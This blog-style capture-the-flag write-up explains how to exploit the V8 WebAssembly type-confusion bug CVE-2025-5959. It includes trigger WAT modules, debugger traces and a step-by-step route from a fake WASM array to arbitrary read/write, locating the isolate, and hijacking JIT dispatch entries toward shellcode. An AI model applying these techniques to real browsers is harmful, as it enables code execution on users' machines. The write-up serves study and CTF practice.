24 February 2026

Firstly, my apologies if this blog post is a bit rambly. In the middle of 2025, I was approached to playtest a V8 challenge for TISC, a CTF organised by the government in my home country. The task was quite straightforward: exploit the n-day CVE-2025-5959. From Gerald’s write-up, it seems that the challenge was made the final and presumably hardest challenge of the CTF, which was surprising, given that a full RCE exploit is available online.

In this first of two blog posts, I will discuss my exploitation approach for this n-day. In the next part, I will show how I modified the vulnerable code a little so that the exploitation takes a completely different route. Finally, I know it’s been almost half a year since the CTF took place; I am pretty slow :).

I’ll refrain from distributing the full playtest version of the challenge in case of copyright issues, but the key is basically just unpatching CVE-2025-5959. The following commit is used for the CTF, and all code references in this write-up will follow it.

diff --git a/src/wasm/canonical-types.h b/src/wasm/canonical-types.h

index 9a520aa59b7..911cf33e5a5 100644

--- a/src/wasm/canonical-types.h

+++ b/src/wasm/canonical-types.h

@@ -357,8 +357,7 @@ class TypeCanonicalizer {

const bool indexed = type1.has_index();

if (indexed != type2.has_index()) return false;

if (indexed) {

- return type1.is_equal_except_index(type2) &&

- EqualTypeIndex(type1.ref_index(), type2.ref_index());

+ return EqualTypeIndex(type1.ref_index(), type2.ref_index());

}

return type1 == type2;

}
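To make the effect of the removed check concrete, here is a toy model of the comparison in JavaScript. It is only a sketch: the `{ kind, nullable, refIndex }` objects and both function names are made up for illustration and are not V8's real data structures.

```javascript
// Toy model only: a "type" is { kind, nullable, refIndex }, where refIndex
// is null for non-indexed types such as i64. These names are hypothetical.
function equalPatched(t1, t2) {
  const indexed = t1.refIndex !== null;
  if (indexed !== (t2.refIndex !== null)) return false;
  if (indexed) {
    // Patched: everything except the index must match as well.
    return t1.kind === t2.kind && t1.nullable === t2.nullable &&
           t1.refIndex === t2.refIndex;
  }
  return t1.kind === t2.kind && t1.nullable === t2.nullable;
}

function equalUnpatched(t1, t2) {
  const indexed = t1.refIndex !== null;
  if (indexed !== (t2.refIndex !== null)) return false;
  if (indexed) return t1.refIndex === t2.refIndex; // nullability is ignored
  return t1.kind === t2.kind && t1.nullable === t2.nullable;
}

const refNull = { kind: "ref", nullable: true, refIndex: 7 };  // (ref null $T)
const ref = { kind: "ref", nullable: false, refIndex: 7 };     // (ref $T)

console.log(equalPatched(refNull, ref));   // false
console.log(equalUnpatched(refNull, ref)); // true
```

In the unpatched model, a nullable and a non-nullable reference to the same type index compare as equal, which is the confusion the rest of this post builds on.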

A huge disclaimer is that the challenge binary was compiled without V8 sandboxing (v8_enable_sandbox=false). Sorry to folks who were looking for a sandbox bypass approach here.

There is a wonderful write-up of this vulnerability here, where the author stopped short of explaining exploitation for ethical reasons. The actual exploit from the discoverer of the vulnerability can be found here. One must really be cautious of using n-days from real-world hacking competitions in CTFs; there is a high chance of a public exploit.

I will not be explaining the vulnerability in detail, given the two wonderful write-ups. In essence, two WASM structs with almost identical traits apart from the nullability of fields may be treated as equal by V8, causing a type confusion. For my exploitation, I used the two different structs as part of the function prototype in two WASM modules, one exporting a function and one importing it. This is the general structure I used:

The export:

(module

(rec

(type $Point2

(struct

(field (mut i64))

)

)

)

(rec

(type $Point

(struct

(field (mut (ref null $Point2)))

(field (mut (ref $Point2)))

(field (mut (ref null $Point2)))

<omitted for brevity...>

)

)

)

(func (export "f") (result (ref $Point))

(local $p2 (ref $Point2))

(local.set $p2

(struct.new_default $Point2)

)

;; Build the Point: nullable -> ref.null, non-nullable -> $p2

(struct.new $Point

(ref.null $Point2) ;; 1

(local.get $p2) ;; 2

(ref.null $Point2) ;; 3

<omitted for brevity...>

)

)

)

The import:

(module

(rec

(type $Point2

(struct

(field (mut i64))

)

)

)

(rec

(type $Point3

(struct

(field (mut (ref null $Point2)))

(field (mut (ref null $Point2)))

(field (mut (ref $Point2)))

<omitted for brevity...>

)

)

)

(import "A" "f" (func $f (result (ref $Point3))))

(func $trigger (param i32) (result i64)

(call $f)

(struct.get $Point3 2)

(struct.get $Point2 0)

)

(export "trigger" (func $trigger))

)



Unlike the two other exploit devs, I prefer to write the WASM part of my exploit in WAT and then compile the files with binaryen. When the code importing f tries to dereference the first field of a Point2 object that is really null, we get a segfault:

Uh oh


In V8’s WASM implementation, null references aren’t actually null pointers (i.e. zero). Instead, they point to an object known as WasmNull in V8’s read-only heap. When the static roots feature is enabled at compile time (it is by default), we see that WasmNull is in fact an object of 65536 + kTaggedSize bytes:

class WasmNull : public TorqueGeneratedWasmNull<WasmNull, HeapObject> {

public:

#if V8_STATIC_ROOTS_BOOL || V8_STATIC_ROOTS_GENERATION_BOOL

// TODO(manoskouk): Make it smaller if able and needed.

static constexpr int kSize = 64 * KB + kTaggedSize;

Here, kTaggedSize is just the size of a pointer. With pointer compression, that’s 4 bytes. This pointer is a map pointer stored at offset 0 to record the type of the object, which is something all V8 heap objects do. What’s interesting is what happens to the remaining 65536 bytes:

#ifdef V8_ENABLE_WEBASSEMBLY

#if V8_STATIC_ROOTS_BOOL

// Protect the payload of wasm null.

if (!page_allocator()->DecommitPages(

reinterpret_cast<void*>(factory()->wasm_null()->payload()),

WasmNull::kSize - kTaggedSize)) {

V8::FatalProcessOutOfMemory(this, "decommitting WasmNull payload");

}

#endif // V8_STATIC_ROOTS_BOOL

#endif // V8_ENABLE_WEBASSEMBLY

bool OS::DecommitPages(void* address, size_t size) {

DCHECK_EQ(0, reinterpret_cast<uintptr_t>(address) % CommitPageSize());

DCHECK_EQ(0, size % CommitPageSize());

// <...comments...>

void* ret = mmap(address, size, PROT_NONE,

MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

if (V8_UNLIKELY(ret == MAP_FAILED)) {

// Decommitting pages can fail if the limit of VMAs is exceeded.

CHECK_EQ(ENOMEM, errno);

return false;

}

CHECK_EQ(ret, address);

return true;

}

As a security measure, the remaining 65536 bytes are passed to DecommitPages to be marked as guard pages. So, if code operating on WASM objects does not check for WasmNull before accessing object fields, that’s how we get a segfault.

Correction: Everything in the previous sentence is correct, except for the phrase “as a security measure”. It completely slipped my mind, but guard pages will cause a segfault even during normal execution! However, this segfault is caught by V8 and used as a way to detect null-reference dereferences. This is known as an implicit null check. This is a pretty clever optimisation; assuming null-reference dereferences don’t happen very often, we eliminate the need to check each time we dereference. See an addition later for more details.

In V8, the memory layout of WASM objects is described in Torque, a TypeScript-like language.

@abstract

extern class WasmObject extends JSReceiver {}

@highestInstanceTypeWithinParentClassRange

extern class WasmStruct extends WasmObject {}

extern class JSReceiver extends HeapObject {

properties_or_hash: SwissNameDictionary|FixedArrayBase|PropertyArray|Smi;

}

Heap objects contain at least one pointer at offset 0 (the map), and properties_or_hash above is pointer-sized as well. This means that the first field of a WASM struct is stored at offset 2 * 4 = 8. However, when we access this location on WasmNull with struct.get $Point2 0 (see above), the read lands in the guard pages that follow WasmNull’s map pointer, which leads to a segfault. We can see this from the emitted x64 code. The displacement is 7 instead of 8 because heap object pointers in V8 are tagged: their least significant bit is set to 1, so the code subtracts 1 to reach the real address.

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────

$rax : 0x00003fa1000c3611 → 0xfd0000074500056e

$rbx : 0x110

$rcx : 0x00003fa10000fffd → 0x000000000000001f

<...omitted...>

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────

0x1a22b45c48ba call QWORD PTR [r10+rdx*8]

0x1a22b45c48be mov ecx, DWORD PTR [rax+0xf]

0x1a22b45c48c1 add rcx, r14

→ 0x1a22b45c48c4 mov rax, QWORD PTR [rcx+0x7]

0x1a22b45c48c8 mov r10, QWORD PTR [rbp-0x10]

0x1a22b45c48cc mov r10, QWORD PTR [r10+0x57]

0x1a22b45c48d0 sub DWORD PTR [r10], 0x84

0x1a22b45c48d7 js 0x1a22b45c48ef

0x1a22b45c48dd mov rsp, rbp

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "d8", stopped 0x1a22b45c48c4 in ?? (), reason: SIGSEGV

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x1a22b45c48c4 → mov rax, QWORD PTR [rcx+0x7]

[#1] 0x3fa100000011 → add al, 0x0

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤

I used --random-seed 1 to keep addresses stable across runs.

From the previous image, we see that the first i64 field of Point2 is simply stored as a 64-bit number (i.e. QWORD PTR). If we were to instead access a hypothetical second field, its value should be read from offset 8 + 8 = 16. We can see this if we add (field (mut i64)) to Point2’s definition and do struct.get $Point2 1 instead:

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────

$rax : 0x00003fa1000c3619 → 0xfd0000074500056e

$rbx : 0x110

$rcx : 0x00003fa10000fffd → 0x000000000000001f

<...omitted...>

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────

0x1a22b45c48ba call QWORD PTR [r10+rdx*8]

0x1a22b45c48be mov ecx, DWORD PTR [rax+0xf]

0x1a22b45c48c1 add rcx, r14

→ 0x1a22b45c48c4 mov rax, QWORD PTR [rcx+0xf]

0x1a22b45c48c8 mov r10, QWORD PTR [rbp-0x10]

0x1a22b45c48cc mov r10, QWORD PTR [r10+0x57]

0x1a22b45c48d0 sub DWORD PTR [r10], 0x84

0x1a22b45c48d7 js 0x1a22b45c48ef

0x1a22b45c48dd mov rsp, rbp

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "d8", stopped 0x1a22b45c48c4 in ?? (), reason: SIGSEGV

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x1a22b45c48c4 → mov rax, QWORD PTR [rcx+0xf]

[#1] 0x3fa100000011 → add al, 0x0

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤
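The two displacements seen in the debugger (0x7 and 0xf) follow from simple arithmetic. Below is a small sketch, assuming pointer compression (a 4-byte map plus a 4-byte properties_or_hash) and a struct made only of i64 fields; the constant and function names are mine.

```javascript
// Assumed layout with pointer compression: 4-byte map + 4-byte properties_or_hash.
const HEADER_SIZE = 8;
const HEAP_OBJECT_TAG = 1; // tagged pointers have their low bit set
const I64_SIZE = 8;

// Displacement applied to the tagged pointer when loading the i64 field
// at `index`, for a struct whose fields are all i64.
function i64FieldDisplacement(index) {
  return HEADER_SIZE + index * I64_SIZE - HEAP_OBJECT_TAG;
}

console.log(i64FieldDisplacement(0).toString(16)); // 7
console.log(i64FieldDisplacement(1).toString(16)); // f
```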

This gives me an idea: if we accessed a field at a large enough offset from the start of Point2, could our access skip over the 65536-byte guard region? Nesting structs in WASM is not possible, so the largest size for a struct field is 128 bits, using the vector type v128. ChatGPT 5 (back in 2025) used to glitch and claim that V8 only supports a maximum of 2000 struct fields for WASM. This is not true; V8 supports 10,000, and we can prove it here. This puts the last field at an offset of roughly (10,000 - 1) * 16 = 159,984 bytes, which is more than enough for skipping over the guard pages.
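As a sanity check on that idea, the sketch below works out the smallest v128 field index whose first byte lies past the end of WasmNull. It assumes an 8-byte struct header and tightly packed v128 fields; the names are mine, while the sizes come from the snippets above.

```javascript
const KB = 1024;
const TAGGED_SIZE = 4;                        // with pointer compression
const WASM_NULL_SIZE = 64 * KB + TAGGED_SIZE; // WasmNull::kSize
const STRUCT_HEADER = 8;                      // map + properties_or_hash
const V128_SIZE = 16;
const MAX_FIELDS = 10000;

// Offset from the (untagged) object start of v128 field `i`,
// assuming all preceding fields are v128 and packed back to back.
const fieldOffset = (i) => STRUCT_HEADER + i * V128_SIZE;

// Smallest field index that starts at or beyond the end of WasmNull.
const firstIndexPastGuard =
  Math.ceil((WASM_NULL_SIZE - STRUCT_HEADER) / V128_SIZE);

console.log(firstIndexPastGuard);         // 4096
console.log(fieldOffset(MAX_FIELDS - 1)); // 159992
```

Under these assumptions, any field index from 4096 up to 9999 reads memory beyond the guard pages instead of faulting.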

Addition: Following our correction above, we can see that my approach will bypass the implicit null check since it doesn’t segfault. This is when we need an explicit null check. In WASM’s baseline compiler, Liftoff, we see the following:

void StructGet(FullDecoder* decoder, const Value& struct_obj,

const FieldImmediate& field, bool is_signed, Value* result) {

// <...omitted...>

auto [explicit_check, implicit_check] =

null_checks_for_struct_op(struct_obj.type, field.field_imm.index);

if (explicit_check) {

MaybeEmitNullCheck(decoder, obj.gp(), pinned, struct_obj.type);

}

// <...omitted...>

}

void MaybeEmitNullCheck(FullDecoder* decoder, Register object,

LiftoffRegList pinned, ValueType type) {

if (v8_flags.experimental_wasm_skip_null_checks || !type.is_nullable()) {

return;

}

LiftoffRegister null = __ GetUnusedRegister(kGpReg, pinned);

LoadNullValueForCompare(null.gp(), pinned, type);

OolTrapLabel trap =

AddOutOfLineTrap(decoder, Builtin::kThrowWasmTrapNullDereference);

__ emit_cond_jump(kEqual, trap.label(), kRefNull, object, null.gp(),

trap.frozen());

}

If null_checks_for_struct_op returns true for explicit_check, we by default emit a comparison between the reference being dereferenced and WasmNull, throwing an error if they are equal.

std::pair<bool, bool> null_checks_for_struct_op(ValueType struct_type,

int field_index) {

bool explicit_null_check =

struct_type.is_nullable() &&

(null_check_strategy_ == compiler::NullCheckStrategy::kExplicit ||

field_index > wasm::kMaxStructFieldIndexForImplicitNullCheck);

bool implicit_null_check =

struct_type.is_nullable() && !explicit_null_check;

return {explicit_null_check, implicit_null_check};

}

kMaxStructFieldIndexForImplicitNullCheck is defined as 4000. This makes sense, as even with the largest data type, the 16-byte v128, 4000 fields only make up 64,000 bytes. If we access a field index less than or equal to 4000, we definitely wouldn’t jump over the 65536-byte gap after WasmNull. Unfortunately for V8, due to the vulnerability, the reference is typed as non-nullable, so is_nullable() returns false and both the explicit and the implicit check are skipped. Back to the exploitation. (Addition end)
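The decision logic is short enough to mirror in JavaScript. This is only a model of the C++ shown above: the strategy strings are placeholders I chose for compiler::NullCheckStrategy, and 4000 is the limit quoted in the text.

```javascript
const MAX_INDEX_FOR_IMPLICIT_CHECK = 4000; // kMaxStructFieldIndexForImplicitNullCheck

// `strategy` is "explicit" or "trap-handler"; both strings are placeholders.
function nullChecksForStructOp(isNullable, fieldIndex, strategy = "trap-handler") {
  const explicit =
    isNullable &&
    (strategy === "explicit" || fieldIndex > MAX_INDEX_FOR_IMPLICIT_CHECK);
  const implicit = isNullable && !explicit;
  return { explicit, implicit };
}

// Correctly typed nullable reference, far field: explicit check is emitted.
const honest = nullChecksForStructOp(true, 9982);
// Same access through the confused, "non-nullable" type: no check at all.
const confused = nullChecksForStructOp(false, 9982);

console.log(honest.explicit, honest.implicit);     // true false
console.log(confused.explicit, confused.implicit); // false false
```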

There is, however, yet another problem:

0x00003fa100000000 0x00003fa100010000 0x0000000000000000 r--

0x00003fa100010000 0x00003fa100020000 0x0000000000000000 ---

0x00003fa100020000 0x00003fa100040000 0x0000000000000000 r--

0x00003fa100040000 0x00003fa100100000 0x0000000000000000 rw-

WasmNull is at 0x3fa10000fffc, 4 bytes before the guard pages. Even if we skip the maximum number of bytes we can, the furthest field we can reach starts at 0x3fa1000370f4 (0x3fa10000fffc + 8 + 9999 * 16), which is still within the read-only heap. All the dynamically allocated JS objects (well, the new space ones at least) reside at addresses from 0x3fa100040000 onwards.

We now need to turn our attention to WASM arrays. Here’s its Torque definition:

@lowestInstanceTypeWithinParentClassRange

extern class WasmArray extends WasmObject {

length: uint32;

@if(TAGGED_SIZE_8_BYTES) optional_padding: uint32;

@ifnot(TAGGED_SIZE_8_BYTES) optional_padding: void;

}

It’s not described above (I think), but the elements of the WasmArray follow right after the length, similar to how fields follow the header in a WasmStruct. We can’t use arrays as struct fields, but we can have references (i.e. pointers) to arrays. This gives me my second idea of the day: what if we put an array reference as the last field of Point2, and adjust the number of fields before it such that the reference slot lands on a 32-bit value in the read-only heap, somewhere in [0x3fa100020000, 0x3fa100040000], that happens to be a valid compressed pointer p? The 32-bit value at p + 8, where the array length field would be, should be large, so that we get a much larger out-of-bounds access reaching into the “normal” JS (new space) heap.

YMMV for the next part, as our d8 binaries might be different, but I managed to find a suitable candidate for my attack with 9982 v128 fields preceding our array reference:

gef➤ x/wx 0x00003fa10000fffc+8+9982*16

0x3fa100036fe4: 0x0000120d

gef➤ x/wx 0x00003fa100000000+0x120c+8

0x3fa100001214: 0x0d000098

gef➤

After our 9982 v128 fields, we simply add a (field (mut (ref null $Ai32))), where $Ai32 is (type $Ai32 (array (mut i32))). Our fake WASM array at 0x3fa10000120c has a length of 0x0d000098 (not 0x98!). This gives us a far greater out-of-bounds access than before; we now have the capability to read and write anywhere in the JS (new space) heap.
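To use the fake array, a target address has to be translated into an element index. The sketch below does that with the addresses from my debugger session. It assumes that elements start 12 bytes into the object (map, properties_or_hash, length) under pointer compression; that offset and the helper name are assumptions to verify on your own build.

```javascript
const CAGE_BASE = 0x3fa100000000n;      // base seen in the debugger session
const FAKE_ARRAY = CAGE_BASE + 0x120cn; // untagged address of the fake WasmArray
const LENGTH = 0x0d000098n;             // 32-bit value found at FAKE_ARRAY + 8
const ELEMENTS_OFFSET = 12n;            // assumption: map + properties_or_hash + length
const ELEMENT_SIZE = 4n;                // i32 elements

const elementsStart = FAKE_ARRAY + ELEMENTS_OFFSET;
const elementsEnd = elementsStart + LENGTH * ELEMENT_SIZE;

// Returns the array index that aliases `addr`, or null if the address is
// unaligned or outside the range covered by the fake length.
function indexForAddress(addr) {
  if (addr < elementsStart || addr >= elementsEnd) return null;
  const delta = addr - elementsStart;
  if (delta % ELEMENT_SIZE !== 0n) return null;
  return Number(delta / ELEMENT_SIZE);
}

// Index of the first word of the writable heap region at CAGE_BASE + 0x40000.
console.log(indexForAddress(CAGE_BASE + 0x40000n)); // 64378
```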

Before we get into the proper popping of shells, it is important to note that we do not have the addrof primitive that JavaScript exploits often have. Without it, we have no clue where our user-defined JS objects are on the JS heap. This is not a particularly hard problem to solve. We can basically do exactly what V8 does:

Since all heap objects have a static 32-bit map pointer at offset 0, which denotes their type, we can use this to identify objects of a specific type on the heap. We can then use semi-uniquely-identifiable information to identify if the object belongs to us. For example, if we define an ArrayBuffer of size 0x1337 and identify such an object on the heap during scanning, there’s a good chance we’ve found what we own.

We can do a similar thing for JS functions. My approach is slightly more complex and requires multiple dereferences. The code can be found in my exploit.
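The scanning idea for the ArrayBuffer case can be sketched as follows. The map value and the position of the length field are made up here, since both depend on the V8 build, and the "heap" is a plain Uint32Array standing in for reads through the out-of-bounds WASM array.

```javascript
// Hypothetical constants: look these up in your own build.
const ARRAY_BUFFER_MAP = 0x001c7a51; // made-up compressed map pointer
const BYTE_LENGTH_WORD = 5;          // made-up index (in 32-bit words) of the length
const MARKER_LENGTH = 0x1337;        // the size we gave our own ArrayBuffer

// `heap` is any array-like of 32-bit words. Returns the word indices of
// objects with the expected map and our marker length.
function findMarkedArrayBuffers(heap) {
  const hits = [];
  for (let i = 0; i + BYTE_LENGTH_WORD < heap.length; i++) {
    if (heap[i] === ARRAY_BUFFER_MAP &&
        heap[i + BYTE_LENGTH_WORD] === MARKER_LENGTH) {
      hits.push(i);
    }
  }
  return hits;
}

// Simulated heap: one matching object at word 8, one decoy with a different size.
const heap = new Uint32Array(32);
heap[8] = ARRAY_BUFFER_MAP;
heap[8 + BYTE_LENGTH_WORD] = MARKER_LENGTH;
heap[20] = ARRAY_BUFFER_MAP;
heap[20 + BYTE_LENGTH_WORD] = 0x100;

const hits = findMarkedArrayBuffers(heap);
console.log(hits.length, hits[0]); // 1 8
```

The decoy at word 20 shows why the marker size matters: the map alone matches every ArrayBuffer on the heap, not just ours.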

With how rapidly V8’s codebase evolves, every time I attempt to exploit an n-day in V8, it feels like playing a little game of “What still works”. For this n-day, let’s list it out:

1. Without the sandbox, ArrayBuffer instances still contain a full 64-bit pointer to their backing store. I’m sorry to anyone reading, this is honestly such a cop-out. Anyways, that turns our limited JS heap read/write to arbitrary read/write.

2. Overwriting JIT/compiled WASM code held in a rwx page with our shellcode will most likely not work. On modern CPUs implementing x86 (Intel/AMD), there’s a new CPU feature named Memory Protection Keys (MPK). There’s an excellent write-up here. To sum it up, the CPU now has a new special register named pkru, which can control the permissions of selected pages. Now, to write to our rwx page, it must be marked writeable using the mmap/mprotect class of syscalls and marked writeable in pkru. The latter is pretty hard to achieve, as pkru can only be written to with the wrpkru instruction. We will need some form of code execution. By then, there will be easier ways to gain full shellcode execution.

3. We can still smuggle shellcode into JIT code using the approach at the bottom of this write-up. This ol’ reliable approach is a favourite of mine, courtesy of x86’s feature of variable-length instructions.

With the first and third things listed, it should be trivial to get code execution, right? We could just find the entry point of a JIT-compiled function in the JS heap and overwrite it. Unfortunately not. This brings us to the (almost) final part of the write-up.

gef➤ job 0x3fa100080265

0x3fa100080265: [Code]

- map: 0x3fa100000d85 <Map[68](CODE_TYPE)>

- kind: TURBOFAN_JS

- deoptimization_data_or_interpreter_data: 0x3fa1000801d5 <ProtectedFixedArray[15]>

- position_table: 0x3fa100080011 <Other heap object (TRUSTED_BYTE_ARRAY_TYPE)>

- parameter_count: 1

- instruction_stream: 0x5555b6b80231 <InstructionStream TURBOFAN_JS>

- instruction_start: 0x5555b6b80240

- is_turbofanned: 1

- stack_slots: 6

- marked_for_deoptimization: 0

- embedded_objects_cleared: 0

- can_have_weak_objects: 1

- instruction_size: 324

- metadata_size: 24

- inlined_bytecode_size: 0

- osr_offset: -1

- handler_table_offset: 24

- unwinding_info_offset: 24

- code_comments_offset: 24

- instruction_stream.relocation_info: 0x3fa100080251 <Other heap object (TRUSTED_BYTE_ARRAY_TYPE)>

- instruction_stream.body_size: 348

gef➤ grep 0x5555b6b80240

[+] Searching '\x40\x02\xb8\xb6\x55\x55' in memory

[+] In (0x3fa100040000-0x3fa100180000), permission=rw-

0x3fa100080278 - 0x3fa100080290 → "\x40\x02\xb8\xb6\x55\x55[...]"

[+] In (0x7fffe7c20000-0x7fffe7c30000), permission=rw-

0x7fffe7c232b0 - 0x7fffe7c232c8 → "\x40\x02\xb8\xb6\x55\x55[...]"

gef➤

Although there is a copy of a JIT-compiled function’s entry point on the JS heap, we will quickly realise that modifying it does nothing to the function’s execution. What about the other occurrence at 0x7fffe7c232b0? This has to do with something called the JSDispatchTable, which is documented here. To invoke a JS function object, we read a handle value from it, and use it to index into the JS dispatch table outside of the JS heap (e.g. 0x7fffe7c232b0). We then jump to the entry point held in it. Let’s trace it and see it in action.

By setting a read watchpoint on where the function entry point is held, we arrive at the following in the function Builtins_CallFunction_ReceiverIsAny:

0x0000555556bb2096 <+278>: mov r10,QWORD PTR [r13+0x2ef8]

0x0000555556bb209d <+285>: mov rcx,r15

0x0000555556bb20a0 <+288>: shr ecx,0x8

0x0000555556bb20a3 <+291>: shl ecx,0x4

0x0000555556bb20a6 <+294>: mov rcx,QWORD PTR [r10+rcx*1]

=> 0x0000555556bb20aa <+298>: jmp rcx

This code isn’t compiled from anything. Rather, it is emitted from C++ directives via the Code Stub Assembler. At the lower levels, CSA coding is basically like handwriting assembly, with a bit more help. This makes it more than a little difficult to debug CSA code, as there is no easy way to tell which C++ code produced the code we are looking at. I have heard of debug print directives but never tried them.

Anyways, let’s try to trace how this piece of code in Builtins_CallFunction_ReceiverIsAny came about:

Builtins::Generate_CallFunction_ReceiverIsAny (builtins-call-gen.cc:35)

|

v

Builtins::Generate_CallFunction (builtins-x64.cc:2568)

|

|

__ InvokeFunctionCode(rdi, no_reg, rax, InvokeType::kJump); (builtins-x64.cc:2661)

|

v

MacroAssembler::InvokeFunctionCode (macro-assembler-x64.cc:4087)

|

|

LoadEntrypointFromJSDispatchTable(rcx, dispatch_handle); (macro-assembler-x64.cc:4130)

|

v

MacroAssembler::LoadEntrypointFromJSDispatchTable (macro-assembler-x64.cc:711)

In this final function, we see C++ directives that correspond exactly to the assembly above. On x64, the scratch register kScratchRegister is defined to be r10, which matches the r10 in the disassembly. The destination, as we see at line 4130, is indeed rcx.

void MacroAssembler::LoadEntrypointFromJSDispatchTable(

Register destination, Register dispatch_handle) {

DCHECK(!AreAliased(destination, dispatch_handle, kScratchRegister));

LoadAddress(kScratchRegister, ExternalReference::js_dispatch_table_address());

movq(destination, dispatch_handle);

shrl(destination, Immediate(kJSDispatchHandleShift));

shll(destination, Immediate(kJSDispatchTableEntrySizeLog2));

movq(destination, Operand(kScratchRegister, destination, times_1,

JSDispatchEntry::kEntrypointOffset));

}
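The same index computation can be written in JavaScript. The shift amounts are read off the disassembly above (shr by 8, shl by 4, no extra displacement); the table base and handle in the example are hypothetical values chosen to land on the slot from the grep output.

```javascript
const HANDLE_SHIFT = 8;       // kJSDispatchHandleShift (shr ecx, 0x8)
const ENTRY_SIZE_LOG2 = 4;    // kJSDispatchTableEntrySizeLog2 (shl ecx, 0x4)
const ENTRYPOINT_OFFSET = 0n; // mov rcx, [r10+rcx*1] uses no displacement

// Address of the table slot holding the entry point for `dispatchHandle`.
// `tableBase` is a BigInt, `dispatchHandle` a 32-bit number.
function entrypointSlot(tableBase, dispatchHandle) {
  const byteOffset =
    ((dispatchHandle >>> HANDLE_SHIFT) << ENTRY_SIZE_LOG2) >>> 0;
  return tableBase + BigInt(byteOffset) + ENTRYPOINT_OFFSET;
}

// Hypothetical base and handle, for illustration only.
console.log(entrypointSlot(0x7fffe7c20000n, 0x32b00).toString(16)); // 7fffe7c232b0
```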

Firstly, let’s determine where the dispatch_handle is stored in a JS Function object:

extern class JSFunctionOrBoundFunctionOrWrappedFunction extends JSObject {}

// <...omitted...>

@highestInstanceTypeWithinParentClassRange

extern class JSFunction extends JSFunctionOrBoundFunctionOrWrappedFunction {

// TODO(saelo): drop this field once we call through the dispatch_handle.

@ifnot(V8_ENABLE_LEAPTIERING) code: TrustedPointer<Code>;

@if(V8_ENABLE_LEAPTIERING) dispatch_handle: int32;

@if(V8_ENABLE_LEAPTIERING_TAGGED_SIZE_8_BYTES) padding: int32;

shared_function_info: SharedFunctionInfo;

context: Context;

feedback_cell: FeedbackCell;

// Space for the following field may or may not be allocated.

prototype_or_initial_map: JSReceiver|Map;

}

A JSObject (see here) has one more pointer field than a JSReceiver, and therefore we can find the dispatch_handle field at offset 4 * 3 = 0xc in a JS function object.

Moving on, LoadAddress converts an ExternalReference object into the r13+0x2ef8 we see above. kRootRegister is defined as r13 here.

void MacroAssembler::LoadAddress(Register destination,

ExternalReference source) {

if (root_array_available()) {

// <...omitted...>

if (options().enable_root_relative_access) {

intptr_t delta =

RootRegisterOffsetForExternalReference(isolate(), source);

if (is_int32(delta)) {

leaq(destination, Operand(kRootRegister, static_cast<int32_t>(delta)));

return;

}

} // <...omitted...>

}

Move(destination, source);

}

So, where does the root register point to? We do yet another trace (sorry):

InitializeRootRegister (macro-assembler-x64.h:655)

|

|

v

ExternalReference::isolate_root (external-reference.cc:763)

|

|

v

Isolate::isolate_root (execution/isolate.h:1246)

Right below line 1246, we see the calculation of bias, which is the offset of the isolate root from the base of an isolate object:

constexpr static size_t isolate_root_bias() {

return OFFSET_OF(Isolate, isolate_data_) + IsolateData::kIsolateRootBias;

}

isolate_data_ is at offset 0, and kIsolateRootBias is 0x80 on x64, so the root register holds isolate + 0x80. We can conclude that the pointer to the JS Dispatch Table is stored at isolate + 0x80 + 0x2ef8, i.e. the table is at *(isolate + 0x80 + 0x2ef8). I usually do not do detailed traces, but I thought it might be a fun and perhaps useful exercise to reinforce my understanding of CSA compilation.

So what is an isolate? To quote the (kinda uninformative) docs online, it “represents an isolated instance of the V8 engine”. A problem I faced is that JS objects simply do not need to reference the isolate in order to function. Even though ArrayBuffer allows me to do arbitrary reads, I can only work with pointers found on the JS heap, given that ASLR is a thing. Hence, I have no easy way of finding out where the isolate is.

Ultimately, I came up with a pretty hackish solution due to my lack of understanding of V8. I start by listing some facts about the isolate:

1. […] ArrayBuffer objects.
2. […] 0x1000 bytes. See this.
3. […] field_ of type v8::internal::Heap. This object has a pointer field called isolate_ that points to the start of the isolate.

Given these facts, we can do a linear search as such:

1. […] ArrayBuffer and round it down to the page boundary. Let’s call this address curr.
2. Let check be the sum of curr and the offset of isolate.heap_->isolate_ (for me it’s 0xf110).
3. […] ArrayBuffer with check.
4. […] ArrayBuffer. If the value points to curr, that likely means we have found the isolate and we’re done. Otherwise, subtract one page size from curr and go back to step 2.

We should now have the address of the isolate. We can use *(isolate + 0x80 + 0x2ef8) to get the JS dispatch table and add (dispatch_handle >> 8) << 4 to get the memory location of our JIT entry point.
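The linear search can be sketched as below. `read64` is a hypothetical arbitrary-read primitive (in the exploit it would be built on the ArrayBuffer backing store pointer), the starting address is assumed to be some address associated with an ArrayBuffer, and memory is simulated with a Map that returns 0 for anything unset, which a real primitive would not do.

```javascript
const PAGE_SIZE = 0x1000n;
const HEAP_ISOLATE_OFFSET = 0xf110n; // offset of isolate.heap_->isolate_ on my build

// Walks down page by page from `startAddr` until the 64-bit value at
// curr + HEAP_ISOLATE_OFFSET points back at curr. `read64` is hypothetical.
function findIsolate(startAddr, read64, maxPages = 0x10000) {
  let curr = startAddr & ~(PAGE_SIZE - 1n); // round down to a page boundary
  for (let i = 0; i < maxPages; i++) {
    const check = curr + HEAP_ISOLATE_OFFSET;
    if (read64(check) === curr) return curr; // back-pointer matches
    curr -= PAGE_SIZE;
  }
  return null;
}

// Simulated memory: a fake isolate whose heap_.isolate_ points back to it.
const fakeIsolate = 0x555500003000n;
const memory = new Map([[fakeIsolate + HEAP_ISOLATE_OFFSET, fakeIsolate]]);
const read64 = (addr) => memory.get(addr) ?? 0n;

console.log(findIsolate(0x555500123456n, read64).toString(16)); // 555500003000
```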

Given that we have already smuggled our shellcode, I considered two strategies for jumping to it:



1. […]
2. […] r13+0x2ef8) to point to a fake table that contains a pointer to our shellcode.

